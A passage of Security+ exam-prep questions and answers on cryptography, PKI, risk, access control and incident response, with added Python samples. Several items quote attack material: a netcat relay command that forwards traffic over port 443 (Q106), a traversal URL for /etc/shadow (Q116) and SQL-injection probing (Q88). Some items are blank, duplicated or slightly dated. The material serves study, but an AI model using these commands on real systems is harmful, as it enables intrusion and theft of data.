uses the same secret key for both encryption and decryption operations. PKI is incorrect. A public key
infrastructure (PKI) uses trusted third parties that certify or provide proof of key ownership. Entropy is
incorrect because entropy simply means randomness or lack of order.
62. Which of the following provides authentication to a CA on the validity of a client’s certificate
request?
A registration authority (RA) provides authentication to a certificate authority (CA) on the
validity of a client’s certificate request by verifying the requester’s identity before the CA issues the
certificate; in addition, the RA serves as an aggregator of information. PEM
is incorrect because the most common format and extension for certificates is privacy-enhanced mail
(PEM), which is mostly associated with Apache web servers. CA is incorrect because the CA’s job is to
issue certificates, verify the holder of a digital certificate, and ensure that holders of certificates are who
they claim to be. CPS is incorrect because a certification practice statement (CPS) is a legal document
that a CA creates and publishes for the purpose of conveying information to those who depend on the
CA’s issued certificates.
63. You are a security analyst for a large financial institution located on Florida’s Gulf Coast,
where hurricanes and flooding are prevalent. What specific type of recovery site should you have readily
available to ensure that operations continue with the least amount of operational impact?
Because you deal with finances and you need to be up and running with the least amount of
operational impact, you need a hot site. A hot site is a location that is already running and available 7
days a week, 24 hours a day. Such a site allows a company to continue normal business operations,
usually within a minimal period after the loss of a facility. This type of site functions like the original site
and is equipped with all necessary hardware, software, network, and Internet connectivity fully
installed, configured, and operational. The other answers are incorrect. A warm site is a scaled-down
version of a hot site. A warm site is generally configured with power, phone, and network jacks. The site
might have computers and other resources, but they are not configured and ready to go. A cold site is
the weakest of the recovery plan options but also the cheapest. It is less costly in the short term, but
equipment purchased for a cold site after a disaster might be more expensive or difficult to obtain. A
cold site is merely a prearranged request to use facilities, if needed. Electricity, bathrooms, and space
are about the only facilities a cold site contract provides. A disaster recovery site is too general and
could be used to describe any of the sites listed in the other answer options.
64. Which of the following is a smart card used in military, reserve officer, and military
contractor identity authentication systems?
The common access card (CAC) is a credit card–sized “smart” card. It is the standard
identification for active duty uniformed service personnel, selected reserve personnel, DoD civilian
employees, and eligible contractor personnel. It is also the principal card used to enable physical access
to buildings and controlled spaces, and it provides access to DoD computer networks and systems. FAR
is incorrect because the false acceptance rate (FAR) measures the likelihood that an access system will
incorrectly accept an access attempt (in other words, allow access to an unauthorized user). FRR is
incorrect because the false rejection rate (FRR) is the percentage of identification instances in which
false rejection occurs. CER is incorrect. The crossover error rate (CER) is the percentage at which the FAR
and FRR are equal.
65. Which of the following runs a password through an algorithm to produce an enhanced key
that is usually at least 128 bits long?
Key stretching runs a password through a deliberately slow, salted derivation function (for
example PBKDF2, bcrypt, scrypt or Argon2), typically many thousands of times, to produce an enhanced
key that is usually at least 128 bits long. The extra work is negligible for one legitimate login but
multiplies the cost of every guess an attacker makes against a stolen password database. IV is incorrect.
An initialization vector (IV) is a fixed-size input of a random or pseudo-random value. In cryptography,
an IV helps ensure that each message encrypts differently. Steganography is incorrect. Steganography is
a commonly used method of obfuscating data, particularly in media types such as audio, video, image
files, and other documents. Entropy is incorrect because entropy simply means randomness or lack of
order. A lack of entropy can have a negative impact on information security.
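Key stretching with PBKDF2 from the standard library, as an added example that is not part of the original study material. The password, the fixed salt and the iteration counts are constructed for the illustration; real storage uses a fresh random salt per user, as `make_record` does:

```python
import hashlib
import hmac
import os
import time

PASSWORD = b"correct horse battery staple"   # constructed sample password
SALT = bytes.fromhex("0011223344556677")      # constructed fixed salt, for reproducibility only


def stretch(password: bytes, salt: bytes, iterations: int = 600_000, dklen: int = 32) -> bytes:
    """Key stretching with PBKDF2-HMAC-SHA256.

    The password is pushed through HMAC `iterations` times and the output is a
    dklen-byte key (32 bytes = 256 bits, above the 128-bit floor in the answer).
    The salt defeats precomputed tables; the iteration count makes every guess
    cost the attacker as much as it costs the legitimate login."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen)


def fast_hash(password: bytes) -> bytes:
    """The weak alternative: one unsalted SHA-256 pass, checkable billions of
    times per second on a GPU."""
    return hashlib.sha256(password).digest()


def make_record(password: bytes, iterations: int = 600_000) -> dict:
    """What to store: salt, iteration count and derived key, never the password."""
    salt = os.urandom(16)
    return {"salt": salt, "iterations": iterations, "key": stretch(password, salt, iterations)}


def verify_password(record: dict, candidate: bytes) -> bool:
    """Re-derive with the stored parameters and compare in constant time."""
    derived = stretch(candidate, record["salt"], record["iterations"])
    return hmac.compare_digest(derived, record["key"])


def seconds_per_guess(fn, *args) -> float:
    """Wall-clock cost of one evaluation, i.e. what each attacker guess costs."""
    start = time.perf_counter()
    fn(*args)
    return time.perf_counter() - start
```

Tune the iteration count so that `seconds_per_guess(stretch, ...)` lands in the tens to hundreds of milliseconds on your hardware, and store the count with the record so it can be raised later without invalidating existing users.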
67. Which of the following is the conversion of data to its anticipated simplest-known form?
Normalization is the conversion of data to its anticipated simplest-known form. It provides
assurance that every equivalent string has a unique binary representation. This is necessary because, in
Unicode, the same string can have many different representations. Obfuscation/camouflage is incorrect.
Obfuscation/camouflage and encryption are often used in the software development process to prevent
software from being reverse engineered. These practices protect the trade secrets and intellectual
property of organizations. Stored procedures is incorrect because stored procedures are combinations
of precompiled SQL statements, stored in the database, that execute some task. Automation/scripting is
incorrect because automation/scripting greatly increases an organization’s capability to detect and
respond to threats. It combines machine learning (ML) with automation to respond to threats and
maintain critical operations.
68. Which of the following is an integrated circuit that can be programmed or modified in the
field?
System-on-a-chip (SoC) technology is basically a hardware module in a small form factor. SoCs
can be implemented using a field-programmable gate array (FPGA), which is an integrated circuit that
can be programmed or modified in the field. This provides the ability to make changes even after it’s
been deployed. RTOS is incorrect because a real-time operating system (RTOS) is a small operating
system used in embedded systems and IoT applications that allows applications to run with precise
timing and high reliability. NERC is incorrect because North American Electric Reliability Corporation
(NERC) develops reliability standards that are overseen by the Federal Energy Regulatory Commission
(FERC). UAV is incorrect because a UAV is an unmanned aerial vehicle, such as a drone.
69. As a security analyst, you realize that the security risks associated with geotagging are
unwanted advertising, spying, stalking, and theft. How can you limit these risks?
Geotagging allows location data to be attached to images, videos, SMS messages, and website
postings, providing permanent and searchable data. Geotagging can be limited by turning off features
in social network accounts, disabling location services, and selectively using location features. Enable
GPS tracking is incorrect. Geolocation uses Global Positioning System (GPS) tracking to find the location
of a device. More commonly, employers use this feature to locate employees through their devices.
Implementing geofencing is incorrect. Geofencing takes geolocation a step further and uses GPS
coordinates or radio frequency identification (RFID) to define a geographic perimeter. Disable push
notifications is incorrect. A push notification is a brief message or alert that is sent through an installed
application to the users who opted in for notifications.
70. A fellow security analyst asks you about the flow of network traffic. How would you explain
the north–south network traffic flow concept?
Network traffic between the data center and the outside of the network
71. Rashaad needs to protect hosts in his enterprise environment against known malicious
attacks from the network layer up through the application layer. Which of the following should he
implement to recognize and prevent these attacks?
Host intrusion prevention systems (HIPSs) are a necessity in any enterprise environment. These
systems protect hosts and prevent known and unknown malicious attacks from the network layer up
through the application layer. HIDS is incorrect. A host intrusion detection system (HIDS) can detect
malicious activity and send alerting messages, but it does not prevent attacks.
72. Organizations that do business with security and cloud service providers should ensure that
these vendors have reports that attest to their practices around confidentiality, integrity, availability.
What are these reports called?
A SOC 2 report, issued under the AICPA’s SSAE 18 attestation standard, is an independent
auditor’s report on a service provider’s controls against the Trust Services Criteria: security, availability,
processing integrity, confidentiality, and privacy. Organizations that do business with security service
providers, including cloud service providers, should ensure that each of these vendors has a SOC 2
report, which gives vendors a mechanism to communicate their controls externally. There are two
variations: Type I, which reports on the design of the controls at a specific point in time, and Type II,
which also tests their operating effectiveness over a review period, commonly six to twelve months.
“SSAE SOC 3 Type IV” is incorrect because it is not a valid report type: SOC 3 exists, but only as a
general-use summary report, and there is no Type IV.
73. Kitty is a CISO for a large enterprise network with many mobile users. What can she
implement that provides functionality and control over enterprise devices as well as identity and access
management capabilities?
Mobile device management (MDM) provides functionality and control over enterprise devices
by allowing the enrollment of enterprise devices for management functions such as provisioning
devices, tracking inventory, changing configurations, updating, managing applications, and enforcing
policies. Unified endpoint management (UEM) expands on MDM by providing unified capabilities and
also including content and threat management, identity and access management, and application
containerization.
74. Ling just purchased and installed a new SOHO router, complete with WPA3. What does
WPA3 use to prevent offline password attacks?
WPA3 helps prevent offline password attacks by using Simultaneous Authentication of Equals
(SAE), a password-authenticated key exchange that replaces the WPA2 pre-shared key handshake.
Because the session key is not derived directly from the password and each password guess requires a
live exchange with the access point, a captured handshake cannot be fed to an offline dictionary attack.
This allows users to choose easier-to-remember passwords and, through forward secrecy, does not
expose traffic already transmitted even if the password later becomes compromised.
75. Developers at your company require a set of practices that combines software development
and IT operations to shorten the software development life cycle. Which of the following is being
described?
DevOps is a group of practices that combines software development (Dev) and information
technology operations (Ops). Its goal is to shorten the software development lifecycle (SDLC) and
provide continuous delivery through quality software.
76. Which statement is false regarding certificate formats?
The certificate format P7B (PKCS#7) uses Base64 ASCII encoding and includes the common
extensions .p7b or .p7c, which are supported by the Windows operating system and Java Tomcat. This
format includes the header BEGIN PKCS7 and the footer END PKCS7; each is preceded and followed by
five dashes. The other answers are incorrect as these are true statements regarding distinguished
encoding rules (DER), privacy enhanced mail (PEM), and personal information exchange (PFX) certificate
formats. For the Security+ exam, you should also know that DER is associated with Java systems, PEM is
associated with Apache web servers, and PFX is associated with Windows systems.
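Telling the formats in questions 53 and 76 apart and converting between PEM and DER, as an added example that is not part of the original study material. It uses only the Python standard library (`ssl` already ships PEM/DER converters); `SAMPLE_DER` is a constructed five-byte ASN.1 SEQUENCE that stands in for a real certificate so the code runs offline:

```python
import ssl

PEM_CERT_HEADER = "-----BEGIN CERTIFICATE-----"
PEM_PKCS7_HEADER = "-----BEGIN PKCS7-----"

# Constructed placeholder: a minimal DER SEQUENCE (tag 0x30, length 3, INTEGER 1).
# It is NOT a real X.509 certificate; it only stands in for the binary blob.
SAMPLE_DER = bytes.fromhex("3003020101")


def detect_format(data: bytes) -> str:
    """Classify a certificate file by its leading bytes.

    PEM and P7B files are Base64 text wrapped in dashed marker lines; DER is raw
    ASN.1 and begins with the SEQUENCE tag 0x30. A PFX/PKCS#12 file is also DER-
    encoded ASN.1, so a 0x30 first byte alone cannot separate a bare DER
    certificate from a PFX container; check the extension or parse further."""
    head = data.lstrip()[:64]
    if head.startswith(PEM_CERT_HEADER.encode()):
        return "PEM"
    if head.startswith(PEM_PKCS7_HEADER.encode()):
        return "P7B"
    if head[:1] == b"\x30":
        return "DER"
    return "unknown"


def der_to_pem(der: bytes) -> str:
    """Base64-encode the DER bytes and wrap them in the CERTIFICATE markers
    (what you do before pasting a certificate into an Apache config)."""
    return ssl.DER_cert_to_PEM_cert(der)


def pem_to_der(pem: str) -> bytes:
    """Strip the markers and Base64-decode; the stdlib rejects input whose
    header or footer line is missing or mismatched."""
    return ssl.PEM_cert_to_DER_cert(pem)


def convert(data: bytes) -> bytes:
    """Round-trip helper: PEM in -> DER out, DER in -> PEM out."""
    fmt = detect_format(data)
    if fmt == "PEM":
        return pem_to_der(data.decode("ascii"))
    if fmt == "DER":
        return der_to_pem(data).encode("ascii")
    raise ValueError(f"cannot convert {fmt} input")
```

Because PEM is just Base64 text, a certificate that "won't import" on Windows is very often a PEM file with a .cer extension; running `detect_format` on the first bytes settles it faster than guessing from the extension.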
78. Richard wants to use public key cryptography to send an encrypted message to Racheal.
What key does he need to use to encrypt the message?
Richard needs to use Racheal’s public key to encrypt the message. Racheal will then read the
message, using her private key. Richard could sign the message using his private key, and Racheal could
use his public key to ensure that his signature is valid.
79. Which control type includes organizational culture and physical controls that form the outer
line of defense against direct access to data, such as protecting backup media and paying attention to
facility design details?
Operational controls include organizational culture and physical controls that form the outer
line of defense against direct access to data, such as protecting backup media; securing output and
mobile file storage devices; and paying attention to facility design details, including layout, doors,
guards, locks, and surveillance systems. Technical controls are security controls that are executed by
technical systems. Technical controls include logical access control systems, security systems,
encryption, and data classification solutions. Managerial controls (or administrative controls) include
business and organizational processes and procedures, such as security policies and procedures,
personnel background checks, security awareness training, and formal change-management procedures.
The attribute-based access control (ABAC) authorization process is determined by evaluating rules and
policies against attributes associated with an entity, such as the subject, object, operation, or
environment condition.
80. What is a major weakness with heuristic scanning tools that look for instructions or
commands that are not typically found in application programs?
False positives. Heuristic scanning looks for instructions or commands that are not typically
found in application programs, so it can flag malware for which no signature exists yet. The cost is that
legitimate software doing unusual things (packers, installers, administrative tools) trips the same rules,
so these methods are susceptible to false positives. Being unable to identify new viruses until a
database is updated is the weakness of signature-based scanning, which is exactly the gap heuristics are
meant to cover.
81. Logical access control systems, security systems, encryption, and data classification solutions
are examples of what type of controls?
Technical/logical controls are security controls that are executed by technical systems.
Technical controls include logical access control systems, security systems, encryption, and data
classification solutions. Operational and physical are incorrect because operational/physical controls
include organizational culture and physical controls that form the outer line of defense against direct
access to data, such as protecting backup media; securing output and mobile file storage devices; and
paying attention to facility design details.
82. You work for a bank that is interested in moving some of its operations to the cloud, but it is
worried about security. You recently discovered an organization called CloudBank that was formed by 15
local banks as a way for them to build a secure cloud-based environment that can be accessed by the 15
member banks. Which cloud model BEST describes the cloud created by CloudBank?
A community cloud is a cloud deployment in which the infrastructure is shared among several
organizations that belong to the same community or industry and have similar computing and
compliance concerns. It is a multi-tenant setup, but the tenants are a closed, known group rather than
the general public, which is what distinguishes it from a public cloud. For joint business ventures,
industry consortia, and research organizations, a community cloud is an appropriate solution. Based on
the description of 15 member banks coming together to create the CloudBank organization and its cloud
computing environment, a community cloud model is being described.
83. Which of the following must be combined with a threat to create risk?
A risk results from the combination of a threat and a vulnerability. A vulnerability is a weakness
in a device, system, application, or process that might allow an attack to take place. A threat is an
outside force that may exploit a vulnerability.
84.
85. Which type of authentication method is commonly used with physical access control
systems and relies upon RFID devices embedded into a token?
A proximity card is a contactless card that usually utilizes RFID to communicate with the reader
on a physical access system. These are commonly used to access secured rooms (such as server rooms)
or even a building itself (such as at a mantrap). Some smart cards contain proximity cards within them,
as well, but the best answer to this question is proximity cards since that is the function the smart card
would be used to meet the requirements of this scenario.
86. Maria is trying to log in to her company's webmail and is asked to enter her username and
password. Which type of authentication method is Maria using?
Single-factor authentication (SFA) is a process for securing access to a given system, such as a
network or website, that identifies the party requesting access through only one category of credentials
(something you know, something you have, something you are, or something you do). The most
common example of single-factor authentication occurs when a user is prompted to enter their
username and password in order to authenticate.
87. The paparazzi have found copies of pictures of a celebrity's new baby online. The celebrity
states they were never publicly released but were uploaded to their cloud provider's automated photo
backup. Which of the following threats was the celebrity MOST likely a victim of?
Unauthorized root access
88. You have been hired to perform a web application security test. During the test, you notice
that the site is dynamic and, therefore, must be using a backend database. You decide you want to test
to determine if the site is susceptible to a SQL injection. What is the first character that you should
attempt to use in breaking a valid SQL request?
The single quote character (') is used because it is the string delimiter in SQL. Sending a lone
single quote closes the string literal early: if the application concatenates your input into the query
without escaping or parameterizing it, the database returns a syntax error (or the page behaves
differently), which tells you that your input reaches the SQL parser and that the strings are not properly
escaped in the targeted application.
89. Your company just launched a new invoicing website for use by your five largest vendors.
You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is
timing out, and the website overall is performing slowly. You have noticed that the website received
three million requests in just 24 hours, and the service has now become unavailable for use. What do
you recommend should be implemented to restore and maintain the availability of the new invoicing
system?
By implementing whitelisting of the authorized IP addresses for the five largest vendors, they
will be the only ones who will be able to access the webserver. This can be done by creating rules in the
Access Control List (ACL) to deny ALL other users except these five vendors, thereby dropping a large
number of requests from any other IP addresses, such as those from an attacker.
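Replaying an access log through a deny-by-default allowlist, as an added example that is not part of the original study material. The log excerpt, the vendor prefixes (RFC 5737 documentation ranges) and the function names are all constructed for the illustration; on a real edge device the same allowlist becomes the firewall or load-balancer ACL:

```python
import ipaddress
from collections import Counter
from typing import List, Tuple

# Constructed access-log excerpt (source IP and request line). The 192.0.2.x
# hosts stand in for the flood; the other two sources are legitimate vendors.
SAMPLE_LOG = """\
203.0.113.10 GET /invoice/123
198.51.100.7 GET /invoice/555
192.0.2.44 GET /invoice/1
192.0.2.45 GET /invoice/1
203.0.113.10 POST /invoice/123/pay
192.0.2.46 GET /invoice/1
192.0.2.47 GET /invoice/1
198.51.100.7 GET /invoice/556
"""

# Constructed egress prefixes for the five vendors; everything else is denied.
VENDOR_ALLOWLIST = [
    ipaddress.ip_network(n)
    for n in ("203.0.113.0/28", "198.51.100.7/32", "203.0.113.64/27",
              "198.51.100.128/25", "192.0.2.200/29")
]


def is_allowed(src: str) -> bool:
    """Deny by default: a source passes only if it falls inside an allowlisted prefix."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in VENDOR_ALLOWLIST)


def apply_acl(log: str) -> Tuple[List[str], Counter]:
    """Replay the log through the ACL: return the requests that would reach the
    web server and a per-source count of what the ACL dropped."""
    passed: List[str] = []
    dropped: Counter = Counter()
    for line in log.splitlines():
        src, _request = line.split(" ", 1)
        if is_allowed(src):
            passed.append(line)
        else:
            dropped[src] += 1
    return passed, dropped


def top_sources(log: str, n: int = 3) -> List[Tuple[str, int]]:
    """Triage view before the ACL: which sources generate the most requests."""
    return Counter(line.split(" ", 1)[0] for line in log.splitlines()).most_common(n)
```

Allowlisting works in this scenario only because the legitimate user population is five known organizations with stable egress addresses; for a public-facing site the same flood would call for rate limiting and upstream DDoS mitigation instead. Keep the list in version control and review it when a vendor changes providers, or the next outage will be self-inflicted.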
90. Dion Training has a $15,000 server that has been crashing frequently. Over the past 12
months, the server has crashed 10 times, requiring the server to be rebooted in order to recover from
the crash. Each time, this has resulted in a 5% loss of functionality or data. Based on this information,
what is the Annual Loss Expectancy (ALE) for this server?
To calculate the ALE, you need to multiply the Single Loss Expectancy (SLE) by the Annual Rate
of Occurrence (ARO). The SLE is calculated by multiplying the Exposure Factor (EF) by the Asset Value
(AV). Therefore, SLE = EF x AV, and ALE = SLE x ARO. For this scenario, the asset value is $15,000, the
annual rate of occurrence is 10 times per year, and the exposure factor is 5% (or 0.05). To calculate the
SLE, SLE = 0.05 x $15,000 = $750. Therefore, the ALE = SLE x ARO = $750 x 10 = $7,500.
91. Dion Training allows its visiting business partners from CompTIA to use an available Ethernet
port in their conference room to establish a VPN connection back to the CompTIA internal network. The
CompTIA employees should be able to obtain internet access from the Ethernet port in the conference
room, but nowhere else in the building. Additionally, if a Dion Training employee uses the same
Ethernet port in the conference room, they should be able to access Dion Training's secure internal
network. Which of the following technologies would allow you to configure this port and support both
requirements?
Network Access Control (NAC) uses a set of protocols to define and implement a policy that
describes how to secure access to network nodes whenever a device initially attempts to access the
network. NAC can utilize an automatic remediation process by fixing non-compliant hosts before
allowing network access. Network Access Control can control access to a network with policies,
including pre-admission endpoint security policy checks and post-admission controls over where users
and devices can go on a network and what they can do. In this scenario, implementing NAC can identify
which machines are known and trusted Dion Training assets, and provide them with access to the secure
internal network. NAC could also determine which are unknown machines (assumed to be those of
CompTIA employees), and provide them with direct internet access only by placing them onto a guest
network or VLAN. While MAC filtering could be used to allow or deny access to the network, it cannot by
itself control which set of network resources could be utilized from a single Ethernet port. A security
information and event management (SIEM) system provides real-time analysis of security alerts
generated by applications and network hardware. An access control list could define which ports,
protocols, or IP addresses could be reached from the Ethernet port, but it would be unable to distinguish
between a Dion Training employee's laptop and a CompTIA employee's laptop the way a NAC
implementation could.
92. Joseph would like to prevent hosts from connecting to known malware distribution domains.
What type of solution should be used without deploying endpoint protection software or an IPS system?
DNS blackholing is a process that uses a list of known domains/IP addresses belonging to
malicious hosts and uses an internal DNS server to create a fake reply.
93. Which of the following types of attacks occurs when an attacker sends unsolicited messages
over Facebook messenger?
Spim is a type of spam targeting users of instant messaging (IM) services, SMS, or private
messages within websites and social media. If the unsolicited messages were sent by email, they would
have instead been classified as Spam.
94. An internet marketing company decided that they didn't want to follow the rules for
GDPR because it would create too much work for them. They wanted to buy insurance, but no insurance
company would write them a policy to cover any fines received. They considered how much the fines
might be, and decided to simply ignore the regulation and its requirements. Which of the following risk
strategies did the company choose?
Acceptance.
95. Chris just downloaded a new third-party email client for his smartphone. When Chris
attempts to log in to his email with his username and password, the email client generates an error
message stating that "Invalid credentials" were entered. Chris assumes he must have forgotten his
password, so he resets his email's username and password and then reenters them into the email client.
Again, Chris receives an "Invalid credentials" error. What is MOST likely causing the "Invalid credentials"
error in regard to Chris's email client?
If a user or system has configured their email accounts to require two-factor authentication
(2FA) or multifactor authentication, then even if they enter their username and password correctly in
the third-party email client, they will receive the "Invalid credentials" error message.
96. Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring
of their network. To supplement her team, she contracts with a managed SOC service. Which of the
following services or providers would be best suited for this role?
A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS,
and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part
of their core service offerings.
97. If you are unable to ping a target because you are receiving no response or a response that
states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to
try to elicit a response from a host using TCP, what tool would you use?
Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and
then displays any replies. It was inspired by the ping command but offers far more control over the
probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly
useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the
standard utilities. This often allows you to map out firewall rule sets.
98. Which of the following would NOT be useful in defending against a zero-day threat?
Patching.
99. You have been asked to install a computer in a public workspace. The computer should only
be used by an authorized user. Which of the following security requirements should you implement to
prevent unauthorized users from accessing the network with this computer?
To prevent the computer from being used inadvertently to access the network, the system
should be configured to require authentication whenever the computer is woken up.
100. Which law requires that government agencies and other organizations that operate
systems on behalf of government agencies comply with security standards?
The Federal Information Security Management Act (FISMA) is a United States federal law that
defines a comprehensive framework to protect government information, operations, and assets against
natural or man-made threats. FISMA requires that government agencies and other organizations that
operate systems on behalf of government agencies comply with security standards.
101. Which of the following is a senior role with the ultimate responsibility for maintaining
confidentiality, integrity, and availability in a system?
A data owner is a person responsible for the confidentiality, integrity, availability, and privacy of
information assets. They are usually senior executives with the authority and responsibility to make
decisions about those assets.
102. Keith wants to validate the application file that he downloaded from the vendor of the
application. Which of the following should he compare against the file to verify the integrity of the
downloaded application?
MD5 or SHA1
103. Which type of monitoring would utilize a network tap?
Network taps are devices that allow a copy of network traffic to be captured for analysis. They
conduct passive network monitoring and visibility without interfering with the network traffic itself.
104. Which of the following is the leading cause for cross-site scripting, SQL injection, and XML
injection attacks?
A primary vector for attacking applications is to exploit faulty input validation. The input could
include user data entered into a form or URL, passed by another application or link. This is heavily
exploited by cross-site scripting, SQL injection, and XML injection attacks.
105. Which type of personnel control is being implemented if Kirsten must receive and
inventory any items that her coworker, Bob, orders?
separation of duties
106. An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based
on this command, what will occur?
Netcat will listen on port 8080 and output anything received to a remote connection on
192.168.1.76 port 443.
The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port.
Then, the | character pipes the output of the first command into the input of the second, so both run as
a single command line. Next, netcat is being told to send the data to the given IP (192.168.1.76) over
port 443. This is a common technique to try to bypass the firewall by sending traffic over port 443, the
port normally used for HTTPS (SSL/TLS), which firewalls typically allow.
107. Which of the following type of digital forensic investigations is most challenging due to the
on-demand nature of the assets being analyzed?
Cloud Services.
108. An attacker has compromised a virtualized server. You are conducting forensic analysis as
part of the recovery effort but found that the attacker deleted a virtual machine image as part of their
malicious activity. Which of the following challenges do you now have to overcome as part of the
recovery and remediation efforts?
Due to the deletion of the VM disk image, you will now have to conduct file carving or other
data recovery techniques to recover and remediate the virtualized server. If the server's host uses a
proprietary file system, such as VMFS on ESXi, this can further limit support by data recovery tools. The
attacker may have widely fragmented the image across the host file system when they deleted the disk
image. VM instances are most useful when they are elastic (meaning they spin up when needed and are
destroyed, without preserving any local data, once their task is complete), but this can lead to the loss
of system logs. To prevent this, most VMs also save their logs to an external syslog server or file.
Virtual machine file formats are image-based and written to a mass storage device. Depending on the
configuration and VM state, security must merge any checkpoints into the main image using a
hypervisor tool, rather than recovering from an old snapshot, and then roll forward. It is possible to
load VM data into a memory analysis tool, such as Volatility, although the file formats used by some
hypervisors require conversion first, or the analysis tool may not support them at all.
109. Which party in a federation provides services to members of the federation?
Relying parties (RPs) provide services to members of a federation.
110. Which analysis framework makes no allowance for an adversary retreat in its analysis?
Lockheed Martin cyber kill chain
111. You have been asked to write a new security policy to reduce the risk of employees
working together to steal information from the Dion Training corporate network. Which of the following
policies should you create to counter this threat?
A mandatory vacation policy
112. Dion Training has an open wireless network called "InstructorDemos" for its instructors to
use during class, but they do not want any students connecting to this wireless network. The instructors
need the "InstructorDemos" network to remain open since some of their IoT devices used during course
demonstrations do not support encryption. Based on the requirements provided, which of the following
configuration settings should you use to satisfy the instructors' requirements and prevent students from
using the "InstructorDemos" network?
Since the instructors need to keep the wireless network open, the BEST option is to implement
MAC filtering to prevent the students from connecting to the network while still keeping the network
open. Since the instructors would most likely use the same devices to connect to the network, it would
be relatively easy to implement a MAC-filtering-based whitelist of devices that are allowed to use the
open network and reject any other devices not listed by the instructors (like the students' laptops or
phones). Reducing the signal strength would not solve this issue since students and instructors are both
in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the
students from accessing or using the open network.
113. Dion Training is building a new data center. The group designing the facility has decided to
provide additional HVAC capacity to ensure the data center maintains a consistently low temperature.
Which of the following is the most likely benefit that will be achieved by increasing the designed HVAC
capacity?
Longer MTBF of hardware due to lower operating temperatures
114. A financial services company wants to donate some old hard drives from their servers to a
local charity, but they are concerned about the possibility of residual data being left on the drives.
Which of the following secure disposal methods would you recommend the company use?
In a cryptographic erase (CE), the storage media is encrypted by default. The encryption key
itself is destroyed during the erasing operation. CE is a feature of self-encrypting drives (SED) and is
often used with solid-state devices. Cryptographic erase can be used with hard drives, as well.
115. Which of the following is not normally part of an endpoint security suite?
Endpoint security includes software host-based firewalls, host-based intrusion protection systems
(HIPS), and anti-virus software. A VPN is not typically considered an endpoint security tool because it is
a network security tool.
116. A cybersecurity analyst is reviewing the logs of a proxy server and sees the following URL,
http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?
This is an example of a directory traversal. A directory traversal attack aims to access files and
directories that are stored outside the webroot folder.
117. When your credit card data is written to the customer invoicing system at Dion Training, the first 12
digits are replaced with an x before storing the data. Which of the following privacy methods is being
used?
Data masking can mean that all or part of the contents of a field is redacted, by substituting all
character strings with x, for example.
118. Kurt believes that his directory server is under attack. He notices unauthorized queries and even
password changes. What type of attack is most likely occurring in this scenario?
An LDAP injection attack is similar to SQL injection, but instead, malicious input is applied to a directory
server, which may result in unauthorized queries, granting of permissions, and even password changes.
119. Which system provides authentication and access control in an enterprise network using UDP
transport to a central network access server?
The Remote Authentication Dial-In User Service (RADIUS) remote access control system provides
authentication and access control in an enterprise network using UDP transport to a central network
access server. In turn, this provides credentials for client access to resources within the extended
enterprise.
120. NAC focuses on controlling access to the network based on the compliance of connecting devices,
ensuring that only secure and authorized devices can join the network. On the other hand, ACL is
concerned with regulating the flow of network traffic based on predefined rules, specifying which
packets are allowed or denied based on criteria like source/destination addresses and ports.
121. A security analyst conducts an Nmap scan of a server and finds that port 25 is open. What risk
might this server be exposed to?
Open Mail Relay. Port 25 is the default port for SMTP (Simple Mail Transfer Protocol), which is
used for sending email. An open mail relay occurs when an SMTP server is configured in such a way
that it allows anyone on the Internet to send email through it, not just mail originating from your known
and trusted users. Spammers can exploit this type of vulnerability to use your email server for their
benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web
portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service,
such as telnet (23), FTP (20/21), or the web (80).
122. Which of the following is not normally part of an endpoint security suite?
Endpoint security includes software host-based firewalls, host-based intrusion protection systems
(HIPS), and anti-virus software. A VPN is not typically considered an endpoint security tool because it is
a network security tool.
123. A cybersecurity analyst has determined that an attack has occurred against your company’s
network. Fortunately, your company uses a good logging system with a centralized Syslog server, so all
the logs are available, collected, and stored properly. According to the cybersecurity analyst, the logs
indicate that the database server was the only company server on the network that appears to have
been attacked. The network is a critical production network for your organization. Therefore, you have
been asked to choose the LEAST disruptive actions on the network while performing the appropriate
incident response actions. Which actions do you recommend as part of the response efforts?
Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the
affected server, and maintain the chain of custody
124. Dion Training is currently undergoing an audit of its information systems. The auditor wants to
understand better how the PII data from a particular database is used within business operations. Which
of the following employees should the auditor interview?
The primary role of the data protection officer (DPO) is to ensure that her organization processes the
personal data of its staff, customers, providers, or any other individuals (also referred to as data
subjects) in compliance with the applicable data protection rules. They must understand how any
privacy information is used within business operations. Therefore, they are the best person for the
auditor to interview to get a complete picture of the data usage.
125. An attacker uses the nslookup interactive mode to locate information on a Domain Name Service
(DNS). What command should they type to request the appropriate records for only the name servers?
The nslookup command is used to query the Domain Name System to obtain the mapping between a
domain name and an IP address or to view other DNS records. The "set type=ns" command tells nslookup
to report information only on name servers. If you used "set type=mx" instead, you would receive
information only about mail exchange servers.
126. During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices
a recent Windows operating system vulnerability exists on every terminal. Since these systems are all
embedded and require a manufacturer update, the analyst cannot install Microsoft's regular patch.
Which of the following options would be best to ensure the systems remain protected and
compliant with the rules outlined by the PCI DSS?
Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would
be to implement some compensating controls. If a vulnerability exists that cannot be patched,
compensating controls can mitigate the risk. Additionally, the analyst should document the current
situation to achieve compliance with PCI DSS.
127. What sanitization technique uses only logical techniques to remove data, such as overwriting a
hard drive with a random series of ones and zeroes?
Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection
against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and
seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory
settings.
128. Which of the following hashing algorithms results in a 160-bit fixed output?
RIPEMD creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit
fixed output. MD-5 creates a 128-bit fixed output.
